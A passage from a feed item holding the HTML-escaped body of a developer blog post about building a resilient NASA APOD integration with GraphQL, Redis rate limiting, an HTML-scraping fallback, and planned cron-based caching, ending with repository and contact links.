  &lt;span class="na"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;2026-02-18&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="na"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;user_xyz&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Results
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Implementation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Uptime&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;99.9% (fallback handles NASA API downtime)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Response time&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&amp;lt;500ms (NASA API), ~1.2s (HTML fallback)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Error rate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;0.1% (network failures only, auto-recovered)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rate limit protection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;5 req/hr per user (Redis atomic counters)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Test coverage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;94% (28 passing unit tests)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Lines of code&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1,200 (including tests)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GraphQL queries&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;2 (&lt;code&gt;getTodaysApod&lt;/code&gt;, &lt;code&gt;getApodByDate&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Fallback success rate&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;100% (HTML scraping never failed in production)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Real-World Reliability
&lt;/h3&gt;

&lt;p&gt;During a 72-hour period where NASA's API had intermittent 504 errors:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Primary API success rate:&lt;/strong&gt; 78%&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fallback activation:&lt;/strong&gt; 22%&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;User-facing errors:&lt;/strong&gt; 0%&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Users never knew NASA's API was struggling. The fallback handled it seamlessly — that's the whole point of building resilient systems.&lt;/p&gt;




&lt;h2&gt;
  
  
  Tech Stack
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Layer&lt;/th&gt;
&lt;th&gt;Technology&lt;/th&gt;
&lt;th&gt;Purpose&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Frontend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Next.js 16 + React 19&lt;/td&gt;
&lt;td&gt;UI with floating action button + dialog&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;UI Library&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Radix UI + TailwindCSS 4&lt;/td&gt;
&lt;td&gt;Accessible components, NASA branding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Backend&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Node.js + Express + Apollo Server 5&lt;/td&gt;
&lt;td&gt;GraphQL API&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Schema&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;GraphQL + GraphQL Shield&lt;/td&gt;
&lt;td&gt;Type-safe API with field-level authorization&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Validation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Zod&lt;/td&gt;
&lt;td&gt;Runtime schema validation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;API Client&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fetch API + AbortController&lt;/td&gt;
&lt;td&gt;HTTP with timeouts and retries&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scraping&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Cheerio&lt;/td&gt;
&lt;td&gt;HTML parsing for fallback&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rate Limiting&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Redis + Lua scripts&lt;/td&gt;
&lt;td&gt;Atomic counters per user&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Database&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;MongoDB&lt;/td&gt;
&lt;td&gt;Cache successful APOD responses&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Logging&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Winston&lt;/td&gt;
&lt;td&gt;Structured logs for observability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Testing&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Jest + ts-jest&lt;/td&gt;
&lt;td&gt;Unit tests with mocked services&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Future Roadmap
&lt;/h2&gt;

&lt;p&gt;The current implementation is production-ready, but there's always room to grow. Here are 5 ideas — feel free to add yours in the comments!&lt;/p&gt;

&lt;h3&gt;
  
  
  Idea #1: Database Caching Layer
&lt;/h3&gt;

&lt;p&gt;Right now, every request hits NASA's API (or HTML fallback). Next iteration:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Cache successful responses in MongoDB&lt;/li&gt;
&lt;li&gt;Return cached APOD if date already fetched&lt;/li&gt;
&lt;li&gt;Reduce API quota usage by 80%&lt;/li&gt;
&lt;li&gt;Instant response for popular dates&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Idea #2: Admin Dashboard
&lt;/h3&gt;

&lt;p&gt;GraphQL mutations to manually refresh/delete cached APODs:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight graphql"&gt;&lt;code&gt;&lt;span class="k"&gt;mutation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;RefreshApod&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;!)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="n"&gt;refreshApod&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$date&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;date&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;title&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Idea #3: WebSocket Push Updates
&lt;/h3&gt;

&lt;p&gt;Use GraphQL subscriptions to push new APODs to connected clients when they become available at midnight UTC.&lt;/p&gt;

&lt;h3&gt;
  
  
  Idea #4: Zero-Cold-Start: Daily Cron + Redis 24h Cache
&lt;/h3&gt;

&lt;p&gt;Right now, the first user of the day triggers a live NASA API call. That's ~200-500ms of cold latency — acceptable, but not great.&lt;/p&gt;

&lt;p&gt;The plan: a daily cron job fires at &lt;strong&gt;00:01 UTC&lt;/strong&gt;, fetches today's APOD proactively, and stores it in &lt;strong&gt;Redis with a 24h TTL&lt;/strong&gt;. Every subsequent request that day gets a cache hit — sub-10ms response, zero external calls.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Pseudocode: src/jobs/apodDaily.ts&lt;/span&gt;
&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;warmApodCache&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;today&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;toISOString&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;T&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cacheKey&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;`apod:&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;today&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

  &lt;span class="c1"&gt;// Already warm? Skip.&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cached&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;redis&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cacheKey&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cached&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cached&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="c1"&gt;// Fetch fresh from NASA&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;apod&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;fetchApod&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;today&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="c1"&gt;// Cache for exactly 24h (expires at midnight UTC)&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;secondsUntilMidnight&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;getSecondsUntilMidnightUTC&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;redis&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;setex&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cacheKey&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;secondsUntilMidnight&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;apod&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

  &lt;span class="nx"&gt;logger&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;APOD cache warmed&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;date&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;today&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="na"&gt;ttl&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;secondsUntilMidnight&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;apod&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The cron schedule via &lt;code&gt;node-cron&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Fires at 00:01 UTC every day&lt;/span&gt;
&lt;span class="nx"&gt;cron&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;schedule&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;1 0 * * *&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;warmApodCache&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;timezone&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;UTC&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The resolver then checks Redis first before ever hitting NASA:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="nx"&gt;getTodaysApod&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;_&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;__&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;today&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;toISOString&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;split&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;T&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cacheKey&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;`apod:&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;today&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;cached&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;redis&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cacheKey&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cached&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cached&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;        &lt;span class="c1"&gt;// ⚡ &amp;lt;10ms&lt;/span&gt;

  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;withApodErrorHandling&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;                 &lt;span class="c1"&gt;// 🐌 200-500ms&lt;/span&gt;
    &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;fetchApod&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;context&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="p"&gt;}),&lt;/span&gt;
    &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;getTodaysApod&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;
  &lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;},&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Expected impact:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Before&lt;/th&gt;
&lt;th&gt;After&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;First request of the day&lt;/td&gt;
&lt;td&gt;~300ms (live NASA call)&lt;/td&gt;
&lt;td&gt;~5ms (Redis hit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Subsequent requests&lt;/td&gt;
&lt;td&gt;~300ms (live NASA call)&lt;/td&gt;
&lt;td&gt;~5ms (Redis hit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NASA API unavailable&lt;/td&gt;
&lt;td&gt;~1.2s (HTML fallback)&lt;/td&gt;
&lt;td&gt;~5ms (Redis hit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NASA quota usage&lt;/td&gt;
&lt;td&gt;1 req per user visit&lt;/td&gt;
&lt;td&gt;1 req per day total&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The key insight: Redis TTL auto-expires the cache exactly when it stops being valid. No manual invalidation. No stale data. Just &lt;em&gt;fast&lt;/em&gt; for 99% of requests.&lt;/p&gt;

&lt;h3&gt;
  
  
  Idea #5: Analytics Dashboard
&lt;/h3&gt;

&lt;p&gt;Track:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Most popular APOD dates&lt;/li&gt;
&lt;li&gt;Fallback usage percentage&lt;/li&gt;
&lt;li&gt;Average response time (API vs. fallback)&lt;/li&gt;
&lt;li&gt;Rate limit triggers per user&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Key Takeaways
&lt;/h2&gt;

&lt;p&gt;Building production-grade API integrations is 20% "get it working" and 80% "handle when it doesn't work."&lt;/p&gt;

&lt;p&gt;Five principles that made APOD production-ready:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Graceful degradation&lt;/strong&gt; — Fallbacks ensure users never see errors&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime validation&lt;/strong&gt; — Zod catches schema drift before it crashes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modular architecture&lt;/strong&gt; — Focused modules are easier to test and maintain&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shared error handling&lt;/strong&gt; — DRY principle for GraphQL resolvers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Observability&lt;/strong&gt; — Structured logs make debugging trivial&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  Try It Yourself
&lt;/h2&gt;

&lt;p&gt;The full APOD implementation is open source:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Live Demo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt; — Click the NASA rocket button&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitHub Repo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev" rel="noopener noreferrer"&gt;github.com/lfariabr/luisfaria.dev&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;APOD Service&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/tree/master/backend/src/services/apod" rel="noopener noreferrer"&gt;backend/src/services/apod/&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GraphQL Schema&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/backend/src/schemas/types/apodTypes.ts" rel="noopener noreferrer"&gt;backend/src/schemas/types/apodTypes.ts&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Frontend Component&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/tree/master/frontend/src/components/apod" rel="noopener noreferrer"&gt;frontend/src/components/apod/&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Feature Spec&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/luisfaria.dev/blob/master/_docs/featureBreakdown/v2.4.Apod.MD" rel="noopener noreferrer"&gt;_docs/featureBreakdown/v2.4.Apod.MD&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Let's Connect!
&lt;/h2&gt;

&lt;p&gt;Building this NASA integration taught me more about production engineering than any tutorial could. Every failure mode I hit — 504 timeouts, schema drift, rate limits, DNS caching — is something I'll face again in enterprise systems. And now I know how to handle it.&lt;/p&gt;

&lt;p&gt;If you're working with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;GraphQL APIs and error handling patterns&lt;/li&gt;
&lt;li&gt;Third-party API integrations with fallback strategies&lt;/li&gt;
&lt;li&gt;Next.js + Node.js full-stack applications&lt;/li&gt;
&lt;li&gt;Production-grade TypeScript architectures&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'd love to connect and trade war stories:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Tech Stack Summary:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Current Implementation&lt;/th&gt;
&lt;th&gt;Future Extensions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;NASA API + HTML fallback, GraphQL Shield, Redis rate limiting, Zod validation, modular services, Winston logging, 94% test coverage&lt;/td&gt;
&lt;td&gt;Redis 24h cache + daily cron warm-up, GraphQL subscriptions, admin mutations, analytics dashboard&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;p&gt;&lt;em&gt;Built with ☕, 40+ commits, and a healthy fear of blank screens by &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;Luis Faria&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Whether it's concrete or code, structure is everything.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>nasa</category>
      <category>graphql</category>
      <category>node</category>
      <category>react</category>
    </item>
    <item>
      <title>From git pull to GitOps: How I Built a Production CI/CD Pipeline on a $12 DigitalOcean Droplet</title>
